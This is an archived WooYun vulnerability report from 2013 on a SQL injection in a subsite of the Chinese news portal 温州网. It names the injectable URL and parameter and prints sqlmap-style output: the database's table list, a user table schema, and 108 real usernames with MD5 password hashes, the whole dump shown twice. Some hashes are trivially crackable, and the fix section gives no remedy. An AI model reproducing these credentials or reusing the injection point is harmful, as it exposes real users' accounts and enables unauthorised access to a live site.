漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046524
漏洞标题:温州网某分站sql注入漏洞一枚
相关厂商:温州网
漏洞作者: Focusstart
提交时间:2013-12-20 12:39
修复时间:2014-02-03 12:39
公开时间:2014-02-03 12:39
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
注入点:http://brand.66wz.com/store.php?id=18
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
Database: brand
[54 tables]
+-----------------------+
| brand_admincp_group |
| brand_admincp_member |
| brand_admincp_perm |
| brand_adminsession |
| brand_advertisement |
| brand_albumitems |
| brand_attachments |
| brand_attribute |
| brand_attrvalue |
| brand_attrvalue_text |
| brand_blocks |
| brand_brandlinks |
| brand_cache |
| brand_cachenotes |
| brand_categories |
| brand_commentmodels |
| brand_commentscores |
| brand_consumeitems |
| brand_consumemessage |
| brand_correctioninfos |
| brand_crons |
| brand_data |
| brand_gooditems |
| brand_goodjoin |
| brand_goodmessage |
| brand_goodrelated |
| brand_groupbuyitems |
| brand_groupbuyjoin |
| brand_groupbuymessage |
| brand_itemattribute |
| brand_itemupdates |
| brand_members |
| brand_modelcolumns |
| brand_models |
| brand_nav |
| brand_noticeitems |
| brand_noticemessage |
| brand_photoitems |
| brand_relatedinfo |
| brand_reportlog |
| brand_reportreasons |
| brand_scorestats |
| brand_settings |
| brand_shopgroup |
| brand_shopitems |
| brand_shopmapmarks |
| brand_shopmessage |
| brand_shoptag |
| brand_shopupdate |
| brand_spacecomments |
| brand_stat |
| brand_statuser |
| brand_verify |
| brand_xml_client |
+-----------------------+
Table: brand_members
[14 columns]
+-----------------+-----------------------+
| Column | Type |
+-----------------+-----------------------+
| allowadmincp | tinyint(1) unsigned |
| dateline | int(10) unsigned |
| email | char(100) |
| groupid | smallint(6) unsigned |
| ip | char(15) |
| lastcommenttime | int(10) unsigned |
| lastlogin | int(10) unsigned |
| lastsearchtime | int(10) unsigned |
| myshopid | mediumint(8) unsigned |
| password | char(32) |
| taskstatus | tinyint(1) unsigned |
| uid | mediumint(8) unsigned |
| updatetime | int(10) unsigned |
| username | char(15) |
+-----------------+-----------------------+
Table: brand_members
[108 entries]
+--------------+----------------------------------+
| username | password |
+--------------+----------------------------------+
| Aleksan | 67220fb120af135fbd2f88fe7941489a |
| smh | ac77ae8bdfd45b47524e1ceca60c760b |
| aleksan2 | ddea9b4560ca7f3bae9e8351c53cdfd5 |
| dananhai86 | 1bfa71d39c1a6afc0132cf48ade0366e |
| magicyang | 5929aefcc82c9705bfe173822e1defed |
| USAAAA | 3b6844f1ca2af478e6b500197389e595 |
| 温网论坛 | 2152b36bd340d9251b8342d7b57c48d3 |
| 黄作敏 | f378cd3bcfe5784097ed2b0a23594f28 |
| ssadwlll | 06ea0dbe91bb44217cfcf838055195e0 |
| hacksee66 | 598fc77a7e22ef0bf3bc70ec4d632487 |
| hack2010 | 36ee8d6b86eef856494920dd459e966d |
| gjgj | e10adc3949ba59abbe56e057f20f883e |
| 用户名11 | e10adc3949ba59abbe56e057f20f883e |
| AAAA请求权 | e10adc3949ba59abbe56e057f20f883e |
| tuobao | 1473f08e23d9f10b94f7d5117bdd4345 |
| 闯入百年 | 93bbcfa7b587f2fa49a2b061ca496039 |
| 品牌空间 | e10adc3949ba59abbe56e057f20f883e |
| wzlx580 | d4a3c79dc9f90bb897c97f4e7b850d12 |
| 温州吉达 | 770cff32667741ce96de805a88b95135 |
| 黑夜舞者 | bd53532a815c9b53cba6f3d6ea888ec2 |
| wzrcb580 | 68f35f9ef530f0bd4779b1db43b79168 |
| 数码\xb7海信 | e10adc3949ba59abbe56e057f20f883e |
| hacksee | 558921df0bd51c6320cb59c2104c7924 |
| bbcbs | 2532aa5704b6647b2498ccdbc0567c43 |
| 雪拉同映画视觉 | 245483aa0f5ae2f0055766c26755b13c |
| 方大同音乐之旅 | 3dd8026031e6b0b1520856e8b5ffcc91 |
| 天下浪才 | e73c85092b9aa10b2fbd7fb561bb5da2 |
| 调色板 | b67a4c76e6805de689007fd52a10d643 |
| 伤感的心 | ed3eaccad852de7237f8058084a15d50 |
| 沧海航舟 | 12638ab37dac91598ad5cbab9b05312f |
| 邪恶首领 | 7f7919de9c456044bcb4f9e692f1e6f1 |
| ziyao | 9f920b78998d8547460d09a693cb2a06 |
| 郁金芬芳香 | 13bc574a322877d4d81626651bd0a41c |
| 浪迹天涯 | 9d9e36695fa945974d7f142fb38e0922 |
| tiger_tianle | c259abc134cc9a6b21b85b92a5ced340 |
| 钦舞飞扬 | 8d5b4d76e09f9cafe1de57408cf312d4 |
| 韩韶轩 | cea0f3b814df3de0144dc209aa5a08f7 |
| duanchongzi | a113fcf549c9fd6a20b02bb0566efcb4 |
| chenchunlan7 | 25f91d8119ec465c9b02b804ecb5ae60 |
| xdkfysqq | 1f1767b5696e79116b11ecc7f2882783 |
| qfsxbxao | 1f1767b5696e79116b11ecc7f2882783 |
| doyyqipc | 1f1767b5696e79116b11ecc7f2882783 |
| lhfuuwlr | 1f1767b5696e79116b11ecc7f2882783 |
| fgyfdomp | 1f1767b5696e79116b11ecc7f2882783 |
| slyxlnwl | 1f1767b5696e79116b11ecc7f2882783 |
| wmhjnhyn | 1f1767b5696e79116b11ecc7f2882783 |
| fgflosgk | 1f1767b5696e79116b11ecc7f2882783 |
| cvafdded | 1f1767b5696e79116b11ecc7f2882783 |
| acshjhuc | 1f1767b5696e79116b11ecc7f2882783 |
| nntauidi | 1f1767b5696e79116b11ecc7f2882783 |
| jjjndugr | 1f1767b5696e79116b11ecc7f2882783 |
| rokvauhe | 1f1767b5696e79116b11ecc7f2882783 |
| sdwgfcny | 32cc5886dc1fa8c106a02056292c4654 |
| pdiaesxl | 32cc5886dc1fa8c106a02056292c4654 |
| exicbdrq | 32cc5886dc1fa8c106a02056292c4654 |
| onfyojtv | 32cc5886dc1fa8c106a02056292c4654 |
| gftsjjey | 32cc5886dc1fa8c106a02056292c4654 |
| stjjyqqh | 32cc5886dc1fa8c106a02056292c4654 |
| absiapuu | 32cc5886dc1fa8c106a02056292c4654 |
| kvqripwb | 32cc5886dc1fa8c106a02056292c4654 |
| letgjxkr | 32cc5886dc1fa8c106a02056292c4654 |
| fhcpldqx | 32cc5886dc1fa8c106a02056292c4654 |
| wircsctk | 32cc5886dc1fa8c106a02056292c4654 |
| otlvfmif | 32cc5886dc1fa8c106a02056292c4654 |
| wedelpau | 32cc5886dc1fa8c106a02056292c4654 |
| ijggwhel | 32cc5886dc1fa8c106a02056292c4654 |
| lbxgvftq | 32cc5886dc1fa8c106a02056292c4654 |
| bovifkgp | 32cc5886dc1fa8c106a02056292c4654 |
| eqrswjsy | 32cc5886dc1fa8c106a02056292c4654 |
| ttrlhtex | 32cc5886dc1fa8c106a02056292c4654 |
| pcggkams | 32cc5886dc1fa8c106a02056292c4654 |
| sxwqvofh | 32cc5886dc1fa8c106a02056292c4654 |
| rhrkffng | 32cc5886dc1fa8c106a02056292c4654 |
| skkgnaes | 32cc5886dc1fa8c106a02056292c4654 |
| cdqikivf | 32cc5886dc1fa8c106a02056292c4654 |
| emfhtpxp | 32cc5886dc1fa8c106a02056292c4654 |
| pivhylbp | 32cc5886dc1fa8c106a02056292c4654 |
| xvahovng | 32cc5886dc1fa8c106a02056292c4654 |
| 阿嫒 | a9707e805d8aadbd28824b071a077bf2 |
| xdhowvua | 32cc5886dc1fa8c106a02056292c4654 |
| vjgbwivq | 32cc5886dc1fa8c106a02056292c4654 |
| ctysnfea | 32cc5886dc1fa8c106a02056292c4654 |
| kfrvabqg | 32cc5886dc1fa8c106a02056292c4654 |
| kbxmrofm | 32cc5886dc1fa8c106a02056292c4654 |
| mmhhndxh | 32cc5886dc1fa8c106a02056292c4654 |
| iaxeoccq | 32cc5886dc1fa8c106a02056292c4654 |
| cfeykfhc | 32cc5886dc1fa8c106a02056292c4654 |
| mujuasvd | 32cc5886dc1fa8c106a02056292c4654 |
| qraotrmp | 32cc5886dc1fa8c106a02056292c4654 |
| gjumwgfv | 32cc5886dc1fa8c106a02056292c4654 |
| jurjxsvt | 32cc5886dc1fa8c106a02056292c4654 |
| colgsmij | 32cc5886dc1fa8c106a02056292c4654 |
| clebraum | 32cc5886dc1fa8c106a02056292c4654 |
| aaaaaaabc | 5a2e936fbf1908d95973918efc4b6780 |
| tbtmueju | 32cc5886dc1fa8c106a02056292c4654 |
| dpmadlmb | 32cc5886dc1fa8c106a02056292c4654 |
| jnecwami | 32cc5886dc1fa8c106a02056292c4654 |
| qmmylwqj | 32cc5886dc1fa8c106a02056292c4654 |
| xknaqwol | 32cc5886dc1fa8c106a02056292c4654 |
| hyaouvgq | 32cc5886dc1fa8c106a02056292c4654 |
| jyvovxcj | 32cc5886dc1fa8c106a02056292c4654 |
| knvtvcrt | 32cc5886dc1fa8c106a02056292c4654 |
| rggrcili | 32cc5886dc1fa8c106a02056292c4654 |
| jsyblgel | 32cc5886dc1fa8c106a02056292c4654 |
| hflefnbn | 32cc5886dc1fa8c106a02056292c4654 |
| xlbakayx | 32cc5886dc1fa8c106a02056292c4654 |
| ohcnegca | 32cc5886dc1fa8c106a02056292c4654 |
| test888 | 96e79218965eb72c92a549dd5a330112 |
+--------------+----------------------------------+
漏洞证明:
注入点:http://brand.66wz.com/store.php?id=18
web application technology: Nginx, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
Database: brand
[54 tables]
+-----------------------+
| brand_admincp_group |
| brand_admincp_member |
| brand_admincp_perm |
| brand_adminsession |
| brand_advertisement |
| brand_albumitems |
| brand_attachments |
| brand_attribute |
| brand_attrvalue |
| brand_attrvalue_text |
| brand_blocks |
| brand_brandlinks |
| brand_cache |
| brand_cachenotes |
| brand_categories |
| brand_commentmodels |
| brand_commentscores |
| brand_consumeitems |
| brand_consumemessage |
| brand_correctioninfos |
| brand_crons |
| brand_data |
| brand_gooditems |
| brand_goodjoin |
| brand_goodmessage |
| brand_goodrelated |
| brand_groupbuyitems |
| brand_groupbuyjoin |
| brand_groupbuymessage |
| brand_itemattribute |
| brand_itemupdates |
| brand_members |
| brand_modelcolumns |
| brand_models |
| brand_nav |
| brand_noticeitems |
| brand_noticemessage |
| brand_photoitems |
| brand_relatedinfo |
| brand_reportlog |
| brand_reportreasons |
| brand_scorestats |
| brand_settings |
| brand_shopgroup |
| brand_shopitems |
| brand_shopmapmarks |
| brand_shopmessage |
| brand_shoptag |
| brand_shopupdate |
| brand_spacecomments |
| brand_stat |
| brand_statuser |
| brand_verify |
| brand_xml_client |
+-----------------------+
Table: brand_members
[14 columns]
+-----------------+-----------------------+
| Column | Type |
+-----------------+-----------------------+
| allowadmincp | tinyint(1) unsigned |
| dateline | int(10) unsigned |
| email | char(100) |
| groupid | smallint(6) unsigned |
| ip | char(15) |
| lastcommenttime | int(10) unsigned |
| lastlogin | int(10) unsigned |
| lastsearchtime | int(10) unsigned |
| myshopid | mediumint(8) unsigned |
| password | char(32) |
| taskstatus | tinyint(1) unsigned |
| uid | mediumint(8) unsigned |
| updatetime | int(10) unsigned |
| username | char(15) |
+-----------------+-----------------------+
Table: brand_members
[108 entries]
+--------------+----------------------------------+
| username | password |
+--------------+----------------------------------+
| Aleksan | 67220fb120af135fbd2f88fe7941489a |
| smh | ac77ae8bdfd45b47524e1ceca60c760b |
| aleksan2 | ddea9b4560ca7f3bae9e8351c53cdfd5 |
| dananhai86 | 1bfa71d39c1a6afc0132cf48ade0366e |
| magicyang | 5929aefcc82c9705bfe173822e1defed |
| USAAAA | 3b6844f1ca2af478e6b500197389e595 |
| 温网论坛 | 2152b36bd340d9251b8342d7b57c48d3 |
| 黄作敏 | f378cd3bcfe5784097ed2b0a23594f28 |
| ssadwlll | 06ea0dbe91bb44217cfcf838055195e0 |
| hacksee66 | 598fc77a7e22ef0bf3bc70ec4d632487 |
| hack2010 | 36ee8d6b86eef856494920dd459e966d |
| gjgj | e10adc3949ba59abbe56e057f20f883e |
| 用户名11 | e10adc3949ba59abbe56e057f20f883e |
| AAAA请求权 | e10adc3949ba59abbe56e057f20f883e |
| tuobao | 1473f08e23d9f10b94f7d5117bdd4345 |
| 闯入百年 | 93bbcfa7b587f2fa49a2b061ca496039 |
| 品牌空间 | e10adc3949ba59abbe56e057f20f883e |
| wzlx580 | d4a3c79dc9f90bb897c97f4e7b850d12 |
| 温州吉达 | 770cff32667741ce96de805a88b95135 |
| 黑夜舞者 | bd53532a815c9b53cba6f3d6ea888ec2 |
| wzrcb580 | 68f35f9ef530f0bd4779b1db43b79168 |
| 数码\xb7海信 | e10adc3949ba59abbe56e057f20f883e |
| hacksee | 558921df0bd51c6320cb59c2104c7924 |
| bbcbs | 2532aa5704b6647b2498ccdbc0567c43 |
| 雪拉同映画视觉 | 245483aa0f5ae2f0055766c26755b13c |
| 方大同音乐之旅 | 3dd8026031e6b0b1520856e8b5ffcc91 |
| 天下浪才 | e73c85092b9aa10b2fbd7fb561bb5da2 |
| 调色板 | b67a4c76e6805de689007fd52a10d643 |
| 伤感的心 | ed3eaccad852de7237f8058084a15d50 |
| 沧海航舟 | 12638ab37dac91598ad5cbab9b05312f |
| 邪恶首领 | 7f7919de9c456044bcb4f9e692f1e6f1 |
| ziyao | 9f920b78998d8547460d09a693cb2a06 |
| 郁金芬芳香 | 13bc574a322877d4d81626651bd0a41c |
| 浪迹天涯 | 9d9e36695fa945974d7f142fb38e0922 |
| tiger_tianle | c259abc134cc9a6b21b85b92a5ced340 |
| 钦舞飞扬 | 8d5b4d76e09f9cafe1de57408cf312d4 |
| 韩韶轩 | cea0f3b814df3de0144dc209aa5a08f7 |
| duanchongzi | a113fcf549c9fd6a20b02bb0566efcb4 |
| chenchunlan7 | 25f91d8119ec465c9b02b804ecb5ae60 |
| xdkfysqq | 1f1767b5696e79116b11ecc7f2882783 |
| qfsxbxao | 1f1767b5696e79116b11ecc7f2882783 |
| doyyqipc | 1f1767b5696e79116b11ecc7f2882783 |
| lhfuuwlr | 1f1767b5696e79116b11ecc7f2882783 |
| fgyfdomp | 1f1767b5696e79116b11ecc7f2882783 |
| slyxlnwl | 1f1767b5696e79116b11ecc7f2882783 |
| wmhjnhyn | 1f1767b5696e79116b11ecc7f2882783 |
| fgflosgk | 1f1767b5696e79116b11ecc7f2882783 |
| cvafdded | 1f1767b5696e79116b11ecc7f2882783 |
| acshjhuc | 1f1767b5696e79116b11ecc7f2882783 |
| nntauidi | 1f1767b5696e79116b11ecc7f2882783 |
| jjjndugr | 1f1767b5696e79116b11ecc7f2882783 |
| rokvauhe | 1f1767b5696e79116b11ecc7f2882783 |
| sdwgfcny | 32cc5886dc1fa8c106a02056292c4654 |
| pdiaesxl | 32cc5886dc1fa8c106a02056292c4654 |
| exicbdrq | 32cc5886dc1fa8c106a02056292c4654 |
| onfyojtv | 32cc5886dc1fa8c106a02056292c4654 |
| gftsjjey | 32cc5886dc1fa8c106a02056292c4654 |
| stjjyqqh | 32cc5886dc1fa8c106a02056292c4654 |
| absiapuu | 32cc5886dc1fa8c106a02056292c4654 |
| kvqripwb | 32cc5886dc1fa8c106a02056292c4654 |
| letgjxkr | 32cc5886dc1fa8c106a02056292c4654 |
| fhcpldqx | 32cc5886dc1fa8c106a02056292c4654 |
| wircsctk | 32cc5886dc1fa8c106a02056292c4654 |
| otlvfmif | 32cc5886dc1fa8c106a02056292c4654 |
| wedelpau | 32cc5886dc1fa8c106a02056292c4654 |
| ijggwhel | 32cc5886dc1fa8c106a02056292c4654 |
| lbxgvftq | 32cc5886dc1fa8c106a02056292c4654 |
| bovifkgp | 32cc5886dc1fa8c106a02056292c4654 |
| eqrswjsy | 32cc5886dc1fa8c106a02056292c4654 |
| ttrlhtex | 32cc5886dc1fa8c106a02056292c4654 |
| pcggkams | 32cc5886dc1fa8c106a02056292c4654 |
| sxwqvofh | 32cc5886dc1fa8c106a02056292c4654 |
| rhrkffng | 32cc5886dc1fa8c106a02056292c4654 |
| skkgnaes | 32cc5886dc1fa8c106a02056292c4654 |
| cdqikivf | 32cc5886dc1fa8c106a02056292c4654 |
| emfhtpxp | 32cc5886dc1fa8c106a02056292c4654 |
| pivhylbp | 32cc5886dc1fa8c106a02056292c4654 |
| xvahovng | 32cc5886dc1fa8c106a02056292c4654 |
| 阿嫒 | a9707e805d8aadbd28824b071a077bf2 |
| xdhowvua | 32cc5886dc1fa8c106a02056292c4654 |
| vjgbwivq | 32cc5886dc1fa8c106a02056292c4654 |
| ctysnfea | 32cc5886dc1fa8c106a02056292c4654 |
| kfrvabqg | 32cc5886dc1fa8c106a02056292c4654 |
| kbxmrofm | 32cc5886dc1fa8c106a02056292c4654 |
| mmhhndxh | 32cc5886dc1fa8c106a02056292c4654 |
| iaxeoccq | 32cc5886dc1fa8c106a02056292c4654 |
| cfeykfhc | 32cc5886dc1fa8c106a02056292c4654 |
| mujuasvd | 32cc5886dc1fa8c106a02056292c4654 |
| qraotrmp | 32cc5886dc1fa8c106a02056292c4654 |
| gjumwgfv | 32cc5886dc1fa8c106a02056292c4654 |
| jurjxsvt | 32cc5886dc1fa8c106a02056292c4654 |
| colgsmij | 32cc5886dc1fa8c106a02056292c4654 |
| clebraum | 32cc5886dc1fa8c106a02056292c4654 |
| aaaaaaabc | 5a2e936fbf1908d95973918efc4b6780 |
| tbtmueju | 32cc5886dc1fa8c106a02056292c4654 |
| dpmadlmb | 32cc5886dc1fa8c106a02056292c4654 |
| jnecwami | 32cc5886dc1fa8c106a02056292c4654 |
| qmmylwqj | 32cc5886dc1fa8c106a02056292c4654 |
| xknaqwol | 32cc5886dc1fa8c106a02056292c4654 |
| hyaouvgq | 32cc5886dc1fa8c106a02056292c4654 |
| jyvovxcj | 32cc5886dc1fa8c106a02056292c4654 |
| knvtvcrt | 32cc5886dc1fa8c106a02056292c4654 |
| rggrcili | 32cc5886dc1fa8c106a02056292c4654 |
| jsyblgel | 32cc5886dc1fa8c106a02056292c4654 |
| hflefnbn | 32cc5886dc1fa8c106a02056292c4654 |
| xlbakayx | 32cc5886dc1fa8c106a02056292c4654 |
| ohcnegca | 32cc5886dc1fa8c106a02056292c4654 |
| test888 | 96e79218965eb72c92a549dd5a330112 |
+--------------+----------------------------------+
修复方案:
你懂的
版权声明:转载请注明来源 Focusstart@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝